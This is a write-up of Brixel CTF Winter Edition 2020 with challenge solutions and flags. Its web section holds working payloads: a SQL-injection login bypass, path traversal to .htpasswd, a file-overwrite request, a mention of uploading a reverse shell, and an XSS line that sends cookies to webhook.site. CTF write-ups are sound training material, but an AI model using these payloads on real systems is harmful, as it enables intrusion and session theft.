--- tags: 'CTF' --- Brixel CTF Winter Edition === :::info <i class="fa fa-user-circle-o" aria-hidden="true"></i> @codeskill <i class="fa fa-clock-o" aria-hidden="true"></i> 2020-12-26 <i class="fa fa-external-link" aria-hidden="true"></i> https://ctf.brixel.space/ ::: [TOC] ## Programming ### Are you fast enough?  `solve.sh` ```bash= #!/bin/bash curl -s http://timesink.be/speedy/ -X POST -d inputfield=$(curl -s http://timesink.be/speedy/index.php -c cookie.txt | grep -oP '(?<=div id="rndstring" align="center">).*(?=<\/div><br>)' | tr -d "\n" | tr -d -) -b cookie.txt ``` `./solve.sh` ```htmlembedded= <html><body><div align="center"><h1>Are you fast enough?</h1></div><hr><div align="center">You took: 0 second(s) to complete the task.</div><br><div align="center">Congratulations, you completed the task in under 1 seconds!</div><div algin="center">The flag is: <b>brixelCTF{sp33d_d3m0n}</b></div></body></html>% ``` `solve.py` ```python3= import requests import re t = "http://timesink.be/speedy" s = requests.Session() print(f"Requesting {t}...") req = s.get(t) p = re.compile('<div id="rndstring" align="center">(\w*)</div>') random_str = p.search(req.text).group(1) print(f"Got randomstring: {random_str}") print(f"Posting...") r2 = s.post("http://timesink.be/speedy/index.php", data={"inputfield": random_str}) print(r2.text) ``` :::success brixelCTF{sp33d_d3m0n} ::: ### Keep walking `solve.py` ```python= x = 1 y = 1 previous_answer = 1 answer = x * y + previous_answer + 3 while (x < 525): x = x + 1 y = y + 1 previous_answer = answer answer = x * y + previous_answer + 3 print ("answer="+str(answer)) print ("previous_answer="+str(previous_answer)) print ("x="+str(x)) print ("y="+str(y)) print ("formula: "+str(answer)+"="+str(x)+"*"+str(y)+"+"+str(previous_answer)+"+"+"3") ``` ```python3= x = 1 y = 1 prev_answer = 1 answer = None while x <= 525: answer = x*y + prev_answer + 3 print(f"{x = } ==> {answer = }") x += 1 y += 1 prev_answer = answer ``` :::success brixelCTF{48373851} ::: ### A song... Copy the song and paste into https://codewithrockstar.com/online  :::success brixelCTF{5667236346614} ::: ### An arduino project ### Quizbot ```python3 import requests import json from bs4 import BeautifulSoup as bs4 ################################################################################ # # Stage 1: # # Request a session for the first "round", in this, we'll submit a lot of wrong # answers and store the resulting solution given to us by the server. The plan # is to use this solutions in a second round to solve the questions # ######################################## # question_mapping maps the question to it's answer # load the stored data question_mapping = {} with open("solutions.json") as data: question_mapping = json.load(data) s1 = requests.Session() s1.close() s1 = requests.Session() #for i in range(0, 2000): i=0 while len(question_mapping) < 1000: print(f"\r{i}\t{len(question_mapping)}", end="", flush=True) r = s1.get("http://timesink.be/quizbot/index.php") soup = bs4(r.text, "html.parser") question = soup.h4.text # post with body: payload = {"insert_answer": "asdfghjkl", "submit": "answer"} r = s1.post("http://timesink.be/quizbot/index.php", data=payload) soup = bs4(r.text, "html.parser") answer = soup.find(id="answer").text question_mapping[question] = answer i+=1 # save the dict to json with open("solutions.json", "w") as outfile: json.dump(question_mapping, outfile) print("") ################################################################################ # # Stage 2: # # Use the solutions collected in stage 1 # ######################################## s2 = requests.Session() for i in range(0, 1100): try: r = s1.get("http://timesink.be/quizbot/index.php", timeout=10) soup = bs4(r.text, "html.parser") question = soup.h4.text try: answer = question_mapping[question] except: answer = "abc" print(question) print(answer) except: print("SOME ERROR OCCURED") try: # post with body: payload = {"insert_answer": answer, "submit": "answer"} r = s1.post("http://timesink.be/quizbot/index.php", data=payload, timeout=10) soup = bs4(r.text, "html.parser") print(r.text) #answer = soup.find(id="answer").text except: print("SOME ERROR OCCURED") ``` :::success brixelCTF{kn0wl3dg3} ::: ## Forensics ### Message from Space https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04 Download the app > `Robot32 - SSTV Image Decoder` Listen the wav file and wait for the render image SSTV in Scottie1-Mode  :::success brixelCTF{SP4C3L4B} ::: ### Lottery Ticket - Picture of lottery ticket - If you zoom in you see compression artifacts around most numbers - Edited numbers got none, sum them together --> Flag is "203" :::success brixelCTF{203} ::: ### Lost evidence foremost extract .wav decode the dtmf in the wave file you get the transaction reason `cocaine` :::success brixelCTF{cocaine} ::: ## OSINT ### Visit Limburg #1 https://www.google.com/maps/d/viewer?mid=13WdFG3f5N8YGKQ6tTO4XTcxZlwFZ2Dgq&ll=50.693156402179554%2C5.707086178620777&z=16 ### Visit Limburg #2 3.05.13 `7.05.09` https://www.google.com/maps/@50.9409526,5.4027559,3a,32.9y,53.72h,88.17t/data=!3m7!1e1!3m5!1spIOYm_3knO82AWp-QKjpBg!2e0!5s20130601T000000!7i13312!8i6656 ### Visit Limburg #3 https://www.openstreetmap.org/search?query=airport%20in%20limburg#map=11/51.0996/5.4437 ### Physical https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers https://osintframework.com/ ### A quick search Google Lens o Yandex images  Eben-Ezer Tower :::success brixelCTF{Eben-Ezer} ::: ### Manhunt (1-n) Facts: - https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/ - https://twitter.com/johnnydorfmeis1 - http://www.howitshould.be - https://github.com/JohnnyDorfmeister 1. `Johnny Dorfmeister`: Taken from the EXIF-data of the image 2. `pishapasha`: Googling the name takes you to this Linkedin-profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/ 3. fav food: `macaroni` Taken from https://www.instagram.com/JohnnyDorfmeister/ 4. bday: tbd 5. `w@yb@ck!`: Using the wayback-machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (Taken from his twitter-account @johnnydorfmeis1) 6. `poetry`: Translate the russian text on howitshould.be with google. 7. Fill in the contact form and his address will be presented 8. "just_married": With google street view on the address from no. 7, move back in time 9. `g1ttern00b`: Username "johnny", Password "letmein" taken from old commit on github ## Reverse Engineering / cracking ### Cookieee! Cheatengine search for the cookie amount increase it done ### noPEEKing strings on the exe ### registerme.exe strings on exe create a file called register.key start the exe ### android app ## Old tech ### punchcard uploda the punchcard here: https://www.masswerk.at/cardreader/ :::success brixelCTF{M41NFR4M3} ::: ### Goodbye old friend Download the SWF Extract the content then again search through the files till you find the flag ### The tape ## Crypto ### Sea code message.wav  ``` - .... . ..-. .-.. .- --. ..-. --- .-. - .... .. ... -.-. .... .- .-.. .-.. . -. --. . .. ... ... . .- --. ..- .-.. .-.. ```  theflagforthischallengeis seagull :::success brixelCTF{seagull} ::: ### Merde vigenere with "confidentiel" as the key: ``` The flag is ``` `brixelCTF{baguette}` ### Merda rot 21 `brixelCTF{pizzanapoli}` ### s̸͖̾̀͊͠h̸̜̒ï̷̧̲͙̭̤͛͒̋t̷̢̲͚͖̑͜ base64 decode + binary decode `brixelCTF{robocop}` ### Scheiße qbhbh zrmua gfbld ocqbv  derflagistsauerkraut the flag is sauerkraut :::success brixelCTF{sauerkraut} ::: ### flawed Username:admin Passwordhash:d269ce15f9c44bc3992a5f4e5f273e06  :::success brixelCTF{notsecure} ::: ### Don't be salty ```python3= import hashlib for a in range(97, 122): for b in range(97, 122): for c in range(97, 122): for d in range(97, 122): for e in range(97, 122): pw = chr(a) + chr(b) + chr(c) + chr(d) + chr(e) pw += "04532@#!!" print(pw, hashlib.md5(pw.encode('utf-8')).hexdigest()) ``` :::success brixelCTF{brute} ::: ## Steganography ### Doc-ception unzip loremipsum.docx unzip loremipsum cat flag.txt flag = openxml :::success brixelCTF{openxml} ::: ### Limewire audio `Audacity > Spectrogram`  :::success brixelCTF{hellokitty} ::: ### Scan Me - qr-code image - crop smaller qr-code image from first - go to website, scan barcode - enter result, scan next barcode, repeat - receive flag: brixelCTF{m4st3r_0f_sc4n5} :::success brixelCTF{m4st3r_0f_sc4n5} ::: ### Rufus the vampire cat `steghide info rufus.jpg` ``` "rufus.jpg": format: jpeg capacity: 8.5 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "steganopayload639.txt": size: 85.0 Byte encrypted: rijndael-128, cbc compressed: yes ``` `steghide extract -sf rufus.jpg` ``` Enter passphrase: wrote extracted data to "steganopayload639.txt". ``` `less steganopayload639.txt` ``` You thought this was a cute cat picture? NOPE! Chuck Testa! (the flag is: chucktesta) ``` :::success brixelCTF{chucktesta} ::: ## Internet ### Easy ``` curl -s https://ctf.brixel.space/ | grep -i flag <!-- hidden flag: 'brixelCTF{notsosecret}' --> ``` :::success brixelCTF{notsosecret} ::: ### Discord 5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz} :::success brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz} ::: ### Hidden Code https://www.brixel.be/ View page source code and find `konami` /* <![CDATA[ */ var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"}; /* ]]> */ http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif  :::success brixelCTF{Mario} ::: ### Hiding in the background ```htmlembedded= <style> body{color: #FFFFFF; background-color: #000000; background-image: url("/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg"); background-repeat: repeat; background-size: 50%;} </style> ``` wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg strings ctfbg.svg | grep -i ctf sodipodi:docname="ctfbg.svg"> style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}</tspan></text> :::success brixelCTF{happy_holidays} ::: ### Readme https://ctf.brixel.space/guide :::success brixelCTF{freepoints} ::: ### robotopia http://timesink.be/robotopia/robots.txt :::success brixelCTF{sadr0b0tz} ::: ### login1 plain text in javascript source :::success brixelCTF{w0rst_j4v4scr1pt_3v3r!} ::: ### login2  ```javascript= function verify() { password = "brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}" split = 6; if (password.substring(0, split) == 'brixel') { if (password.substring(split*6, split*7) == '180790') { if (password.substring(split, split*2) == 'CTF{st') { if (password.substring(split*4, split*5) == '5cr1pt') { if (password.substring(split*3, split*4) == 'd_j4v4') { if (password.substring(split*5, split*6) == '_h3r3.') { if (password.substring(split*2, split*3) == '1ll_b4') { if (password.substring(split*7, split*8) == '54270}') { console.log("Password Verified") } } } } } } } } else { console.log("Incorrect password"); } } verify() ``` :::success brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270} ::: ### login3 http://timesink.be/login3/password.txt :::success brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!} ::: ### login4 http://timesink.be/login4/password.txt + base64 decode :::success brixelCTF{even_base64_wont_make_you_secure} ::: ### login5 ```javascript! function verify() { var _0x41653e = _0x58ab; password = document[ _0x41653e(0x194) ](_0x41653e(0x192))['value'], alphabet = _0x41653e(0x193), newpassword = alphabet['substr'](0x1, 0x1), // b newpassword = newpassword + alphabet['substr'](0x11, 0x1), // r newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i newpassword = newpassword + alphabet['substr'](0x17, 0x1), // x newpassword = newpassword + alphabet['substr'](0x4, 0x1), // e newpassword = newpassword + alphabet['substr'](0xb, 0x1), // l newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f newpassword = newpassword + alphabet['substr'](39 - 0x2, 0x1), // { newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0 newpassword = newpassword + alphabet['substr'](0x1, 0x1), // b newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f newpassword = newpassword + alphabet['substr'](0x14, 0x1), // u newpassword = newpassword + alphabet['substr'](0x12, 0x1), // s newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c newpassword = newpassword + alphabet['substr'](0x0, 0x1), // a newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0 newpassword = newpassword + alphabet['substr'](0xd, 0x1), // n newpassword = newpassword + alphabet['substr']39 - 0x1, 0x1), // } password == newpassword ? alert(_0x41653e(0x196)) : alert(_0x41653e(0x195)); } ``` :::success brixelctf{0bfuscati0n} ::: ### Browsercheck Google search to identify user-agent used by "ask jeeves crawler" `curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'` ``` <html><body><div align="center"><h1>congratulations</h1>the flag is 'brixelCTF{askwho?}'</div></body></html> ``` :::success brixelCTF{askwho?} ::: ### SnackShack awards ```! curl 'http://timesink.be/snackshackaward/stemmen.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://timesink.be' -H 'Connection: keep-alive' -H 'Referer: http://timesink.be/snackshackaward/index.html' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'score_bammens=0&score_omejan=0&score_fontainas=0&score_tpleintje=5000&score_frietuurtje=0' ``` :::success brixelCTF{bakpau} ::: ### Flat earth brute force usname and login here: http://timesink.be/flatearth/admin.php ``` ' OR ''=' -- ``` :::success brixelCTF{aroundtheglobe} ::: ### Dadjokes Upload reverse shell here: http://timesink.be/dadjokes/jokes/submit.php File Read: http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt `http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\` ```! Notice: Undefined index: title in /home/kevinay5/domains/timesink.be/public_html/dadjokes/jokes/submit.php on line 47 please provide a title ``` The Solution is to fix the Page. This gives you the solution ``` curl 'http://timesink.be/dadjokes/jokes/submit.php?filename=../index.html&title=index&submit=true&content=%0D%0A%3Chtml%3E%3Ctitle%3EDadJokes%2C+your+source+of+lame+dad+jokes%3C%2Ftitle%3E%3Cbody%3E%3 Cdiv+align%3D%22center%22%3E%3Ch1%3EDadJokes%3C%2Fh1%3E%3Chr%3E%3Cimg+src%3D%22images%2Fbanner.png%22+alt%3D%22dadjokes%22%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fread.php%22%3ERead+dad+jokes%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fsubmi t.php%22%3Esubmit+your+own+jokes%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fhtml%3E' ``` `document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')` ### Pathfinders \#1 The index.php is used to load files without any limit, so only access: `http://timesink.be/pathfinder/index.php?page=admin/.htpasswd` :::success brixelCTF{unsafe_include} ::: ### Pathfinders \#2 The index.php is used to load files without any limit, so only access: `http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php` :::success brixelCTF{outdated_php} :::